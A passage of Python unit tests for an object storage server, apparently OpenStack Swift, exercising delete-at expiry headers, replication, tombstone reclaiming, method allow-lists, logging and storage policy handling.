environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': delete_at_timestamp,
'X-If-Delete-At': delete_at_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
self.assertFalse(os.path.isfile(objfile))
# make the x-if-delete-at for some not found
req = Request.blank(
'/sda1/p/a/c/o-not-found',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': delete_at_timestamp,
'X-If-Delete-At': delete_at_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
def test_DELETE_if_delete_at(self):
test_time = time() + 10000
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 99),
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 98)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
delete_at_timestamp = int(test_time - 1)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 97),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 95),
'X-If-Delete-At': str(int(test_time))})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 95)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
delete_at_timestamp = int(test_time - 1)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 94),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 92),
'X-If-Delete-At': str(int(test_time))})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 92),
'X-If-Delete-At': delete_at_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 92),
'X-If-Delete-At': 'abc'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_DELETE_calls_delete_at(self):
given_args = []
def fake_delete_at_update(*args):
given_args.extend(args)
self.object_controller.delete_at_update = fake_delete_at_update
timestamp1 = normalize_timestamp(time())
delete_at_timestamp1 = int(time() + 1000)
delete_at_container1 = str(
delete_at_timestamp1 /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'X-Delete-At': str(delete_at_timestamp1),
'X-Delete-At-Container': delete_at_container1})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(given_args, [
'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', POLICIES[0]])
while given_args:
given_args.pop()
sleep(.00001)
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp2,
'Content-Type': 'application/octet-stream'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
self.assertEqual(given_args, [
'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', POLICIES[0]])
def test_PUT_delete_at_in_past(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'X-Delete-At': str(int(time() - 1)),
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('X-Delete-At in past' in resp.body)
def test_POST_delete_at_in_past(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(time() + 1),
'X-Delete-At': str(int(time() - 1))})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('X-Delete-At in past' in resp.body)
def test_REPLICATE_works(self):
def fake_get_hashes(*args, **kwargs):
return 0, {1: 2}
def my_tpool_execute(func, *args, **kwargs):
return func(*args, **kwargs)
was_get_hashes = diskfile.DiskFileManager._get_hashes
was_tpool_exe = tpool.execute
try:
diskfile.DiskFileManager._get_hashes = fake_get_hashes
tpool.execute = my_tpool_execute
req = Request.blank('/sda1/p/suff',
environ={'REQUEST_METHOD': 'REPLICATE'},
headers={})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
p_data = pickle.loads(resp.body)
self.assertEqual(p_data, {1: 2})
finally:
tpool.execute = was_tpool_exe
diskfile.DiskFileManager._get_hashes = was_get_hashes
def test_REPLICATE_timeout(self):
def fake_get_hashes(*args, **kwargs):
raise Timeout()
def my_tpool_execute(func, *args, **kwargs):
return func(*args, **kwargs)
was_get_hashes = diskfile.DiskFileManager._get_hashes
was_tpool_exe = tpool.execute
try:
diskfile.DiskFileManager._get_hashes = fake_get_hashes
tpool.execute = my_tpool_execute
req = Request.blank('/sda1/p/suff',
environ={'REQUEST_METHOD': 'REPLICATE'},
headers={})
self.assertRaises(Timeout, self.object_controller.REPLICATE, req)
finally:
tpool.execute = was_tpool_exe
diskfile.DiskFileManager._get_hashes = was_get_hashes
def test_REPLICATE_insufficient_storage(self):
conf = {'devices': self.testdir, 'mount_check': 'true'}
self.object_controller = object_server.ObjectController(
conf, logger=debug_logger())
self.object_controller.bytes_per_sync = 1
def fake_check_mount(*args, **kwargs):
return False
with mock.patch("swift.obj.diskfile.check_mount", fake_check_mount):
req = Request.blank('/sda1/p/suff',
environ={'REQUEST_METHOD': 'REPLICATE'},
headers={})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
def test_REPLICATE_reclaims_tombstones(self):
conf = {'devices': self.testdir, 'mount_check': False,
'reclaim_age': 100}
self.object_controller = object_server.ObjectController(
conf, logger=self.logger)
for policy in self.iter_policies():
# create a tombstone
ts = next(self.ts)
delete_request = Request.blank(
'/sda1/0/a/c/o', method='DELETE',
headers={
'x-backend-storage-policy-index': int(policy),
'x-timestamp': ts.internal,
})
resp = delete_request.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
objfile = self.df_mgr.get_diskfile('sda1', '0', 'a', 'c', 'o',
policy=policy)
tombstone_file = os.path.join(objfile._datadir,
'%s.ts' % ts.internal)
self.assertTrue(os.path.exists(tombstone_file))
# REPLICATE will hash it
req = Request.blank(
'/sda1/0', method='REPLICATE',
headers={
'x-backend-storage-policy-index': int(policy),
})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
suffix = pickle.loads(resp.body).keys()[0]
self.assertEqual(suffix, os.path.basename(
os.path.dirname(objfile._datadir)))
# tombstone still exists
self.assertTrue(os.path.exists(tombstone_file))
# after reclaim REPLICATE will rehash
replicate_request = Request.blank(
'/sda1/0/%s' % suffix, method='REPLICATE',
headers={
'x-backend-storage-policy-index': int(policy),
})
the_future = time() + 200
with mock.patch('swift.obj.diskfile.time.time') as mock_time:
mock_time.return_value = the_future
resp = replicate_request.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual({}, pickle.loads(resp.body))
# and tombstone is reaped!
self.assertFalse(os.path.exists(tombstone_file))
# N.B. with a small reclaim age like this - if proxy clocks get far
# enough out of whack ...
with mock.patch('swift.obj.diskfile.time.time') as mock_time:
mock_time.return_value = the_future
resp = delete_request.get_response(self.object_controller)
# we won't even create the tombstone
self.assertFalse(os.path.exists(tombstone_file))
# hashdir sticks around tho
self.assertTrue(os.path.exists(objfile._datadir))
# REPLICATE will clean it all up
resp = replicate_request.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual({}, pickle.loads(resp.body))
self.assertFalse(os.path.exists(objfile._datadir))
def test_SSYNC_can_be_called(self):
req = Request.blank('/sda1/0',
environ={'REQUEST_METHOD': 'SSYNC'},
headers={})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
def test_PUT_with_full_drive(self):
class IgnoredBody(object):
def __init__(self):
self.read_called = False
def read(self, size=-1):
if not self.read_called:
self.read_called = True
return 'VERIFY'
return ''
def fake_fallocate(fd, size):
raise OSError(errno.ENOSPC, os.strerror(errno.ENOSPC))
orig_fallocate = diskfile.fallocate
try:
diskfile.fallocate = fake_fallocate
timestamp = normalize_timestamp(time())
body_reader = IgnoredBody()
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT',
'wsgi.input': body_reader},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'Expect': '100-continue'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
self.assertFalse(body_reader.read_called)
finally:
diskfile.fallocate = orig_fallocate
def test_global_conf_callback_does_nothing(self):
preloaded_app_conf = {}
global_conf = {}
object_server.global_conf_callback(preloaded_app_conf, global_conf)
self.assertEqual(preloaded_app_conf, {})
self.assertEqual(global_conf.keys(), ['replication_semaphore'])
try:
value = global_conf['replication_semaphore'][0].get_value()
except NotImplementedError:
# On some operating systems (at a minimum, OS X) it's not possible
# to introspect the value of a semaphore
raise SkipTest
else:
self.assertEqual(value, 4)
def test_global_conf_callback_replication_semaphore(self):
preloaded_app_conf = {'replication_concurrency': 123}
global_conf = {}
with mock.patch.object(
object_server.multiprocessing, 'BoundedSemaphore',
return_value='test1') as mocked_Semaphore:
object_server.global_conf_callback(preloaded_app_conf, global_conf)
self.assertEqual(preloaded_app_conf, {'replication_concurrency': 123})
self.assertEqual(global_conf, {'replication_semaphore': ['test1']})
mocked_Semaphore.assert_called_once_with(123)
def test_handling_of_replication_semaphore_config(self):
conf = {'devices': self.testdir, 'mount_check': 'false'}
objsrv = object_server.ObjectController(conf)
self.assertTrue(objsrv.replication_semaphore is None)
conf['replication_semaphore'] = ['sema']
objsrv = object_server.ObjectController(conf)
self.assertEqual(objsrv.replication_semaphore, 'sema')
def test_serv_reserv(self):
# Test replication_server flag was set from configuration file.
conf = {'devices': self.testdir, 'mount_check': 'false'}
self.assertEqual(
object_server.ObjectController(conf).replication_server, None)
for val in [True, '1', 'True', 'true']:
conf['replication_server'] = val
self.assertTrue(
object_server.ObjectController(conf).replication_server)
for val in [False, 0, '0', 'False', 'false', 'test_string']:
conf['replication_server'] = val
self.assertFalse(
object_server.ObjectController(conf).replication_server)
def test_list_allowed_methods(self):
# Test list of allowed_methods
obj_methods = ['DELETE', 'PUT', 'HEAD', 'GET', 'POST']
repl_methods = ['REPLICATE', 'SSYNC']
for method_name in obj_methods:
method = getattr(self.object_controller, method_name)
self.assertFalse(hasattr(method, 'replication'))
for method_name in repl_methods:
method = getattr(self.object_controller, method_name)
self.assertEqual(method.replication, True)
def test_correct_allowed_method(self):
# Test correct work for allowed method using
# swift.obj.server.ObjectController.__call__
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
self.object_controller = object_server.app_factory(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'})
def start_response(*args):
# Sends args to outbuf
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
method_res = mock.MagicMock()
mock_method = public(lambda x:
mock.MagicMock(return_value=method_res))
with mock.patch.object(self.object_controller, method,
new=mock_method):
response = self.object_controller(env, start_response)
self.assertEqual(response, method_res)
def test_not_allowed_method(self):
# Test correct work for NOT allowed method using
# swift.obj.server.ObjectController.__call__
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
self.object_controller = object_server.ObjectController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'}, logger=self.logger)
def start_response(*args):
# Sends args to outbuf
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
answer = ['<html><h1>Method Not Allowed</h1><p>The method is not '
'allowed for this resource.</p></html>']
mock_method = replication(public(lambda x: mock.MagicMock()))
with mock.patch.object(self.object_controller, method,
new=mock_method):
mock_method.replication = True
with mock.patch('time.gmtime',
mock.MagicMock(side_effect=[gmtime(10001.0)])):
with mock.patch('time.time',
mock.MagicMock(side_effect=[10000.0,
10001.0])):
with mock.patch('os.getpid',
mock.MagicMock(return_value=1234)):
response = self.object_controller.__call__(
env, start_response)
self.assertEqual(response, answer)
self.assertEqual(
self.logger.get_lines_for_level('info'),
['None - - [01/Jan/1970:02:46:41 +0000] "PUT'
' /sda1/p/a/c/o" 405 - "-" "-" "-" 1.0000 "-"'
' 1234 -'])
def test_call_incorrect_replication_method(self):
inbuf = StringIO()
errbuf = StringIO()
outbuf = StringIO()
self.object_controller = object_server.ObjectController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'true'}, logger=FakeLogger())
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
obj_methods = ['DELETE', 'PUT', 'HEAD', 'GET', 'POST', 'OPTIONS']
for method in obj_methods:
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
self.object_controller(env, start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
def test_not_utf8_and_not_logging_requests(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
self.object_controller = object_server.ObjectController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false', 'log_requests': 'false'},
logger=FakeLogger())
def start_response(*args):
# Sends args to outbuf
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/\x00%20/%',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
answer = ['Invalid UTF8 or contains NULL']
mock_method = public(lambda x: mock.MagicMock())
with mock.patch.object(self.object_controller, method,
new=mock_method):
response = self.object_controller.__call__(env, start_response)
self.assertEqual(response, answer)
self.assertEqual(self.logger.get_lines_for_level('info'), [])
def test__call__returns_500(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
self.logger = debug_logger('test')
self.object_controller = object_server.ObjectController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false', 'log_requests': 'false'},
logger=self.logger)
def start_response(*args):
# Sends args to outbuf
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
@public
def mock_put_method(*args, **kwargs):
raise Exception()
with mock.patch.object(self.object_controller, method,
new=mock_put_method):
response = self.object_controller.__call__(env, start_response)
self.assertTrue(response[0].startswith(
'Traceback (most recent call last):'))
self.assertEqual(self.logger.get_lines_for_level('error'), [
'ERROR __call__ error with %(method)s %(path)s : ' % {
'method': 'PUT', 'path': '/sda1/p/a/c/o'},
])
self.assertEqual(self.logger.get_lines_for_level('info'), [])
def test_PUT_slow(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
self.object_controller = object_server.ObjectController(
{'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false', 'log_requests': 'false',
'slow': '10'},
logger=self.logger)
def start_response(*args):
# Sends args to outbuf
outbuf.writelines(args)
method = 'PUT'
env = {'REQUEST_METHOD': method,
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False}
mock_method = public(lambda x: mock.MagicMock())
with mock.patch.object(self.object_controller, method,
new=mock_method):
with mock.patch('time.time',
mock.MagicMock(side_effect=[10000.0,
10001.0])):
with mock.patch('swift.obj.server.sleep',
mock.MagicMock()) as ms:
self.object_controller.__call__(env, start_response)
ms.assert_called_with(9)
self.assertEqual(self.logger.get_lines_for_level('info'),
[])
def test_log_line_format(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'})
self.object_controller.logger = self.logger
with mock.patch(
'time.gmtime', mock.MagicMock(side_effect=[gmtime(10001.0)])):
with mock.patch(
'time.time',
mock.MagicMock(side_effect=[10000.0, 10001.0, 10002.0])):
with mock.patch(
'os.getpid', mock.MagicMock(return_value=1234)):
req.get_response(self.object_controller)
self.assertEqual(
self.logger.get_lines_for_level('info'),
['1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD /sda1/p/a/c/o" '
'404 - "-" "-" "-" 2.0000 "-" 1234 -'])
@patch_policies([StoragePolicy(0, 'zero', True),
StoragePolicy(1, 'one', False)])
def test_dynamic_datadir(self):
# update router post patch
self.object_controller._diskfile_router = diskfile.DiskFileRouter(
self.conf, self.object_controller.logger)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test',
'Foo': 'fooheader',
'Baz': 'bazheader',
'X-Backend-Storage-Policy-Index': 1,
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
object_dir = self.testdir + "/sda1/objects-1"
self.assertFalse(os.path.isdir(object_dir))
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertTrue(os.path.isdir(object_dir))
# make sure no idx in header uses policy 0 data_dir
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test',
'Foo': 'fooheader',
'Baz': 'bazheader',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
object_dir = self.testdir + "/sda1/objects"
self.assertFalse(os.path.isdir(object_dir))
with mock.patch.object(POLICIES, 'get_by_index',
lambda _: True):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertTrue(os.path.isdir(object_dir))
def test_storage_policy_index_is_validated(self):
# sanity check that index for existing policy is ok
methods = ('PUT', 'POST', 'GET', 'HEAD', 'REPLICATE', 'DELETE')
valid_indices = sorted([int(policy) for policy in POLICIES])
for index in valid_indices:
object_dir = self.testdir + "/sda1/objects"
if index > 0:
object_dir = "%s-%s" % (object_dir, index)
self.assertFalse(os.path.isdir(object_dir))
for method in methods:
headers = {
'X-Timestamp': next(self.ts).internal,
'Content-Type': 'application/x-test',
'X-Backend-Storage-Policy-Index': index}
if POLICIES[index].policy_type == EC_POLICY:
headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': method},
headers=headers)
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertTrue(is_success(resp.status_int),
'%s method failed: %r' % (method, resp.status))
# index for non-existent policy should return 503
index = valid_indices[-1] + 1
for method in methods:
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': method},
headers={
'X-Timestamp': next(self.ts).internal,
'Content-Type': 'application/x-test',
'X-Backend-Storage-Policy-Index': index})
req.body = 'VERIFY'
object_dir = self.testdir + "/sda1/objects-%s" % index
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 503)
self.assertFalse(os.path.isdir(object_dir))
def test_race_doesnt_quarantine(self):
existing_timestamp = normalize_timestamp(time())
delete_timestamp = normalize_timestamp(time() + 1)
put_timestamp = normalize_timestamp(time() + 2)
# make a .ts
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': existing_timestamp})
req.get_response(self.object_controller)
# force a PUT between the listdir and read_metadata of a DELETE
put_once = [False]
orig_listdir = os.listdir
def mock_listdir(path):
listing = orig_listdir(path)
if not put_once[0]:
put_once[0] = True
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_timestamp,
'Content-Length': '9',
'Content-Type': 'application/octet-stream'})
req.body = 'some data'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
return listing
with mock.patch('os.listdir', mock_listdir):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': delete_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
qdir = os.path.join(self.testdir, 'sda1', 'quarantined')
self.assertFalse(os.path.exists(qdir))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['X-Timestamp'], put_timestamp)
def test_multiphase_put_draining(self):
# We want to ensure that we read the whole response body even if
# it's multipart MIME and there's document parts that we don't
# expect or understand. This'll help save our bacon if we ever jam
# more stuff in there.
in_a_timeout = [False]
# inherit from BaseException so we get a stack trace when the test
# fails instead of just a 500
class NotInATimeout(BaseException):
pass
class FakeTimeout(BaseException):
def __enter__(self):
in_a_timeout[0] = True
def __exit__(self, typ, value, tb):
in_a_timeout[0] = False
class PickyWsgiBytesIO(WsgiBytesIO):
def read(self, *a, **kw):
if not in_a_timeout[0]:
raise NotInATimeout()
return WsgiBytesIO.read(self, *a, **kw)
def readline(self, *a, **kw):
if not in_a_timeout[0]:
raise NotInATimeout()
return WsgiBytesIO.readline(self, *a, **kw)
test_data = 'obj data'
footer_meta = {
"X-Object-Sysmeta-Ec-Frag-Index": "7",
"Etag": md5(test_data).hexdigest(),
}
footer_json = json.dumps(footer_meta)
footer_meta_cksum = md5(footer_json).hexdigest()
test_doc = "\r\n".join((
"--boundary123",
"X-Document: object body",
"",
test_data,
"--boundary123",
"X-Document: object metadata",
"Content-MD5: " + footer_meta_cksum,
"",
footer_json,
"--boundary123",
"X-Document: we got cleverer",
"",
"stuff stuff meaningless stuuuuuuuuuuff",
"--boundary123",
"X-Document: we got even cleverer; can you believe it?",
"Waneshaft: ambifacient lunar",
"Casing: malleable logarithmic",
"",
"potato potato potato potato potato potato potato",
"--boundary123--"
))
if six.PY3:
test_doc = test_doc.encode('utf-8')
# phase1 - PUT request with object metadata in footer and
# multiphase commit conversation
put_timestamp = utils.Timestamp(time()).internal
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
'X-Backend-Storage-Policy-Index': '1',
'X-Backend-Obj-Content-Length': len(test_data),
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
}
wsgi_input = PickyWsgiBytesIO(test_doc)
req = Request.blank(
"/sda1/0/a/c/o",
environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': wsgi_input},
headers=headers)
app = object_server.ObjectController(self.conf, logger=self.logger)
with mock.patch('swift.obj.server.ChunkReadTimeout', FakeTimeout):
resp = req.get_response(app)
self.assertEqual(resp.status_int, 201) # sanity check
in_a_timeout[0] = True # so we can check without an exception
self.assertEqual(wsgi_input.read(), '') # we read all the bytes
@patch_policies(test_policies)
class TestObjectServer(unittest.TestCase):
def setUp(self):
# dirs
self.tmpdir = tempfile.mkdtemp()
self.tempdir = os.path.join(self.tmpdir, 'tmp_test_obj_server')
self.devices = os.path.join(self.tempdir, 'srv/node')
for device in ('sda1', 'sdb1'):
os.makedirs(os.path.join(self.devices, device))
self.conf = {
'devices': self.devices,
'swift_dir': self.tempdir,
'mount_check': 'false',
}
self.logger = debug_logger('test-object-server')
self.app = object_server.ObjectController(
self.conf, logger=self.logger)
sock = listen_zero()
self.server = spawn(wsgi.server, sock, self.app, utils.NullLogger())
self.port = sock.getsockname()[1]
def tearDown(self):
rmtree(self.tmpdir)
def test_not_found(self):
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'GET', '/a/c/o')
resp = conn.getresponse()
self.assertEqual(resp.status, 404)
resp.read()
resp.close()
def test_expect_on_put(self):
test_body = 'test'
headers = {
'Expect': '100-continue',
'Content-Length': len(test_body),
'Content-Type': 'application/test',
'X-Timestamp': utils.Timestamp(time()).internal,
}
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
conn.send(test_body)
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
resp.close()
def test_expect_on_put_footer(self):
test_body = 'test'
headers = {
'Expect': '100-continue',
'Content-Length': len(test_body),
'Content-Type': 'application/test',
'X-Timestamp': utils.Timestamp(time()).internal,
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
}
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
headers = HeaderKeyDict(resp.getheaders())
self.assertEqual(headers['X-Obj-Metadata-Footer'], 'yes')
resp.close()
def test_expect_on_put_conflict(self):
test_body = 'test'
put_timestamp = utils.Timestamp(time())
headers = {
'Expect': '100-continue',
'Content-Length': len(test_body),
'Content-Type': 'application/test',
'X-Timestamp': put_timestamp.internal,
}
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
conn.send(test_body)
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
resp.close()
# and again with same timestamp
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 409)
headers = HeaderKeyDict(resp.getheaders())
self.assertEqual(headers['X-Backend-Timestamp'], put_timestamp)
resp.read()
resp.close()
